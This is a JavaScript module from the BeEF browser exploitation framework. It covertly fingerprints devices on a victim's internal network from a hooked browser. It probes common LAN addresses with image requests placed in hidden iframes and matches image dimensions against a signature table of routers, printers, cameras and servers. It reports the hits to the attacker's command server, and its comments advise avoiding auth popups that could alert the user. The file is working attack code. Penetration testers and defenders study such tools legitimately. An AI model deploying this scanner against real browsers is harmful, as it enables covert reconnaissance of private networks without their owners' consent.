GitHub Repository: beefproject/beef
Path: blob/master/modules/network/internal_network_fingerprinting/command.js
//
// Copyright (c) 2006-2025 Wade Alcorn - [email protected]
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
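// Module options. Each value is filled in from a <%= ... %> template tag
// before the script runs, so every option arrives as a string literal.
var ips = [];
var ipRange = "<%= @ipRange %>";
var ports = "<%= @ports %>";
var threads = parseInt("<%= @threads %>", 10);
// timeout and wait are multiplied by 1000 and later used as timer delays,
// so the options are presumably given in seconds -- confirm against the
// module's option definitions.
var timeout = parseInt("<%= @timeout %>", 10)*1000;
var wait = parseInt("<%= @wait %>", 10)*1000;

// ports becomes an array of port strings; an empty option yields [''].
if (ports != null) {
  ports = ports.split(',');
}

// set target IP addresses
if (ipRange == 'common') {
  // use default IPs
  ips = [
    '192.168.0.1',
    '192.168.0.100',
    '192.168.0.254',
    '192.168.1.1',
    '192.168.1.100',
    '192.168.1.254',
    '10.0.0.1',
    '10.1.1.1',
    '192.168.2.1',
    '192.168.2.254',
    '192.168.100.1',
    '192.168.100.254',
    '192.168.123.1',
    '192.168.123.254',
    '192.168.10.1',
    '192.168.10.254'
  ];
} else {
  // set target IP range
  // The range must look like 192.168.0.1-192.168.0.254. The pattern is
  // assembled with '\\.' so the dots stay escaped: passing the pattern to
  // match() as a plain string literal drops the backslashes, after which
  // "." matches any character and malformed input passes validation.
  var octet = '(25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9]?[0-9])';
  var address = [octet, octet, octet, octet].join('\\.');
  var range = new RegExp('^' + address + '-' + address + '$').exec(ipRange);
  if (range == null) {
    beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=malformed IP range supplied", beef.are.status_error());
    return;
  }
  // Only the fourth octet is iterated (only C class IP ranges are supported
  // atm); the first three octets are taken from the lower bound and the
  // upper bound's first three octets are ignored.
  var prefix = range[1] + "." + range[2] + "." + range[3];
  // Parse the bounds as numbers. Comparing the octets as strings orders
  // them lexicographically ("5" > "254"), which left the list empty for
  // ranges such as x.x.x.5-x.x.x.254.
  var lowerBound = parseInt(range[4], 10);
  var upperBound = parseInt(range[8], 10);
  for (var lastOctet = lowerBound; lastOctet <= upperBound; lastOctet++) {
    ips.push(prefix + "." + lastOctet);
  }
}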
/*
 * Signature table. Each row holds, in order:
 *   [0] "Dev/App Name"                     -- string
 *   [1] "Default Port"                     -- string
 *   [2] "Protocol"                         -- string -- http/https
 *   [3] "Use Multiple Ports if specified"  -- boolean
 *   [4] "IMG path"                         -- string -- file URI path
 *   [5] "IMG width"                        -- integer
 *   [6] "IMG height"                       -- integer
 *
 * When adding new signatures, try to find images which:
 *   * have a unique URI and width/height combination
 *   * use a valid SSL certificate - invalid certs prevent the resource from loading
 *   * do not require HTTP authentication - auth popups may alert the user to the scan
 */
var urls = [
  ["Apache", "80", "http", false, "/icons/apache_pb.gif", 259, 32],
  ["Apache 2.x", "80", "http", false, "/icons/apache_pb2.gif", 259, 32],
  ["Microsoft IIS 7.x", "80", "http", false, "/welcome.png", 571, 411],
  ["Microsoft IIS", "80", "http", false, "/pagerror.gif", 36, 48],
  ["PHP", "80", "http", false, "/?=PHPE9568F34-D428-11d2-A769-00AA001ACF42", 120, 67],
  ["QNAP NAS", "8080", "http", false, "/ajax_obj/img/running.gif", 16, 16],
  ["QNAP NAS", "443", "https", false, "/cgi-bin/images/login/cloud_portal.png", 165, 32],
  ["Asus RT Series Router", "80", "http", false, "/images/top-02.gif", 359, 78],
  ["Asus RX Series Router", "80", "http", false, "/images/bu_blue.gif", 82, 16],
  ["Belkin Router", "80", "http", false, "/images/title_2.gif", 321, 28],
  ["Billion Router", "80", "http", false, "/customized/logo.gif", 318, 69],
  ["Billion Router", "80", "http", false, "/customized/logo.gif", 224, 55],
  ["Netgear N300 Router", "80", "http", false, "/settings.gif", 750, 85],
  ["Linksys NAS", "80", "http", false, "/Admin_top.JPG", 750, 52],
  ["Linksys NAS", "80", "http", false, "/logo.jpg", 194, 52],
  ["D-Link DCS Camera", "80", "http", false, "/devmodel.jpg", 127, 27],
  ["Linksys Network Camera", "80", "http", false, "/welcome.jpg", 146, 250],
  ["Linksys Wireless-G Camera", "80", "http", false, "/header.gif", 750, 97],
  ["Cisco IP Phone", "80", "http", false, "/Images/Logo", 120, 66],
  ["Snom Phone", "80", "http", false, "/img/snom_logo.png", 168, 62],
  ["Dell Laser Printer", "80", "http", false, "/ews/images/delllogo.gif", 100, 100],
  ["Brother Printer", "80", "http", false, "/pbio/brother.gif", 144, 52],
  ["HP LaserJet Printer", "80", "http", false, "/hp/device/images/logo.gif", 42, 27],
  ["HP LaserJet Printer", "80", "http", false, "/hp/device/images/hp_invent_logo.gif", 160, 52],
  ["JBoss Application server", "8080", "http", true, "/images/logo.gif", 226, 105],
  ["APC InfraStruXure Manager", "80", "http", false, "/images/Xlogo_Layer-1.gif", 342, 327],
  ["Barracuda Spam/Virus Firewall", "8000", "http", true, "/images/powered_by.gif", 211, 26],
  ["TwonkyMedia Server", "9000", "http", false, "/images/TwonkyMediaServer_logo.jpg", 150, 82],
  ["VMware ESXi Server", "80", "http", false, "/background.jpeg", 1, 1100],
  ["Microsoft Remote Web Workplace", "80", "http", false, "/Remote/images/submit.gif", 31, 31],
  ["XAMPP", "80", "http", false, "/xampp/img/xampp-logo-new.gif", 200, 59],
  ["Xerox Printer", "80", "http", false, "/printbut.gif", 30, 30],
  ["Konica Minolta Printer", "80", "http", false, "/G27_light.gif", 206, 26],
  ["Epson Printer", "80", "http", false, "/cyandot.gif", 1, 1],
  ["HP Printer", "80", "http", false, "/hp/device/images/hp_invent_logo.gif", 160, 52],
  ["HP Printer Photosmart series", "80", "http", false, "/webApps/images/hp_d_rgb_m.gif", 50, 50],
  ["Lexmark Printer", "80", "http", false, "/images/lexlogo.gif", 153, 115],
  ["Canon Printer", "8000", "http", false, "/login/image/canonlogo.gif", 100, 37],
  ["Zenoss", "8080", "http", false, "/zport/dmd/favicon.ico", 16, 16],
  ["Wordpress", "80", "http", true, "/wp-includes/images/wpmini-blue.png", 16, 16],
  ["Glassfish Server", "4848", "http", false, "/theme/com/sun/webui/jsf/suntheme/images/login/gradlogsides.jpg", 1, 200],
  ["pfSense", "443", "https", false, "/themes/pfsense_ng/images/logo.gif", 200, 56],
  ["pfSense CE <= 2.3.2", "80", "http", false, "/logo.png", 124, 36],
  ["Apache Tomcat", "8080", "http", true, "/docs/images/tomcat.gif", 146, 92],
  // The random path segment is generated once, when this table is built.
  ["Jenkins", "80", "http", false, "/static/" + Math.random().toString(36).substring(2, 10) + "/images/jenkins.png", 240, 323],
  ["SAP NetWeaver", "80", "http", true, "/logon/layout/shadow.jpg", 18, 4],
  ["Netscape iPlanet", "80", "http", true, "/mc-icons/menu.gif", 21, 18],
  ["Kemp Load Master", "443", "https", false, "/kemplogo.png", 951, 75],
  ["m0n0wall", "80", "http", false, "/logo.gif", 150, 47],
  ["SMC Router", "80", "http", false, "/images/logo.gif", 133, 59],
  ["ntop", "3000", "http", false, "/ntop_logo.png", 103, 50],
  ["ZeroShell", "80", "http", false, "/kerbynet/Zeroshell.gif", 180, 63]

  // Uncommon signatures
  //new Array("Microsoft ADFS","80","http",false,"/adfs/portal/illustration/illustration.png",1420,1080),
  //new Array("Rejetto HttpFileServer", "8080", "http",i true, "/~img27",16,16),
  //new Array("Citrix MetaFrame", "80", "http", false, "/Citrix/MetaFrameXP/default/media/nfusehead.gif",230,41),
  //new Array("Oracle E-Business Suite","80","http",false,"/OA_MEDIA/FNDSSCORP.gif",134,31),
  //new Array("OracleAS Reports Service","80","http",false,"/reports/images/oraclelogo_sizewithprodbrand.gif",133,20),
  //new Array("Oracle iLearning","80","http",false,"/ilearn/en/shared/img/coin_help_ready.gif",60,32),
  //new Array("RSA Self-Service Console", "80", "http",false,"/console-selfservice/images/default/icn_help.gif",14,14),
  //new Array("Sambar Server", "80", "http",false,"/sysimage/system/powerby.gif",41,23),
  //new Array("BeEF","3000","http",false,"/ui/media/images/beef.png",200,149),
  //new Array("BeEF (PHP)","80","http",false,"/beef/images/beef.gif",32,32),
  //new Array("Siemens Simatic","80",false,"/Images/Siemens_Firmenmarke.gif",115,76),
  //new Array("Alt-N MDaemon World Client","3000","http",false,"/LookOut/biglogo.gif",342,98),
  //new Array("VLC Media Player","8080","http",false,"/images/white_cross_small.png",9,9),
  //new Array("Syncrify","5800","http",false,"/images/468x60.gif",468,60),
  //new Array("Winamp Web Interface","80","http",false,"/img?image=121",30,30),
];
/*
 * Test one host for one signature.
 *
 * Requests proto://ip:port + uri as an image. If the image loads and its
 * width and height equal columns 5 and 6 of urls[signature_id], the match
 * is reported through beef.net.send. After `timeout` ms the helper iframe
 * is stopped and removed from the document whether or not the image
 * loaded. On the network each call is one image request from the browser
 * to the given host and port.
 *
 * signature_id   -- index into urls, also used as the image element's id
 * signature_name -- name reported on a match
 * proto, ip, port, uri -- parts of the image URL
 *
 * NOTE(review): signature_name is concatenated into the result string
 * without encoding, and escape() is a legacy encoder; confirm how the
 * receiving side parses this string before changing either.
 */
checkSignature = function(signature_id, signature_name, proto, ip, port, uri) {
  var probe = new Image();
  var frame = beef.dom.createInvisibleIframe();

  frame.setAttribute('id', 'lan_<%= @command_id %>_'+signature_id+'_'+proto+'_'+ip);
  beef.debug("[Network Fingerprint] Checking for [" + signature_name + "] at IP [" + ip + "] (" + proto + ")");

  probe.id = signature_id;
  probe.src = proto+"://"+ip+":"+port+uri;

  // A failed load only discards the image element.
  probe.onerror = function() {
    frame.removeChild(probe);
  };

  // A successful load counts as a match only when both dimensions agree
  // with the signature row.
  probe.onload = function() {
    var expected = urls[probe.id];
    if (probe.width != expected[5] || probe.height != expected[6]) {
      return;
    }
    var loaded = escape(probe.src);
    beef.net.send('<%= @command_url %>', <%= @command_id %>,'proto='+proto+'&ip='+ip+'&port='+port+'&discovered='+signature_name+"&url="+loaded, beef.are.status_success());
    frame.removeChild(probe);
    beef.debug("[Network Fingerprint] Found [" + signature_name + "] with URL [" + loaded + "]");
  };

  frame.appendChild(probe);

  // stop & remove iframe
  setTimeout(function() {
    var inner = frame.contentWindow;
    if (inner.stop !== undefined) {
      inner.stop();
    } else if (inner.document.execCommand !== undefined) {
      inner.document.execCommand("Stop", false);
    }
    document.body.removeChild(frame);
  }, timeout);
};
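/*
 * Timer-driven FIFO queue. queue() appends an item and starts an interval
 * timer if none is running; process() runs one item per tick and clears
 * the timer once the queue is empty.
 *
 * frequency -- interval between items, passed straight to setInterval
 *
 * Items should be functions. String items are still accepted so existing
 * callers keep working.
 */
WorkerQueue = function(frequency) {

  var stack = [];
  var timer = null;
  var start_scan = (new Date).getTime();

  this.process = function() {
    var item = stack.shift();
    if (typeof item === 'function') {
      item();
    } else {
      // NOTE(review): legacy path. A string item is executed as code, so
      // any value concatenated into it (names, ports) is parsed as script.
      // Queue functions instead; remove this branch once no caller passes
      // strings.
      eval(item);
    }
    if (stack.length === 0) {
      clearInterval(timer);
      timer = null;
      var interval = (new Date).getTime() - start_scan;
      beef.debug("[Network Fingerprint] Worker queue is complete ["+interval+" ms]");
      return;
    }
  };

  this.queue = function(item) {
    stack.push(item);
    if (timer === null) {
      timer = setInterval(this.process, frequency);
    }
  };

};

// create worker queue
// threads comes from parseInt() on a template option; when it is NaN or
// below 1, fall back to a single queue so workers[u % workerCount] below
// is always defined.
var workerCount = threads >= 1 ? threads : 1;
var workers = [];
for (var w = 0; w < workerCount; w++) {
  workers.push(new WorkerQueue(wait));
}

// Wrap one (signature, ip, port) check in a function. The values are
// captured when the job is queued and passed as arguments, so nothing is
// assembled into a code string. signature_id stays a string, as before.
var makeProbe = function(index, ip, port) {
  var id = String(index);
  var name = urls[index][0];
  var proto = urls[index][2];
  var uri = urls[index][4];
  return function() {
    checkSignature(id, name, proto, ip, port, uri);
  };
};

// for each URI signature
for (var u = 0; u < urls.length; u++) {
  var worker = workers[u % workerCount];
  // for each LAN IP address
  for (var i = 0; i < ips.length; i++) {
    if (!urls[u][3]) {
      // use default port
      worker.queue(makeProbe(u, ips[i], urls[u][1]));
    } else {
      // iterate through all the specified ports
      for (var p = 0; p < ports.length; p++) {
        worker.queue(makeProbe(u, ips[i], ports[p]));
      }
    }
  }
}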
});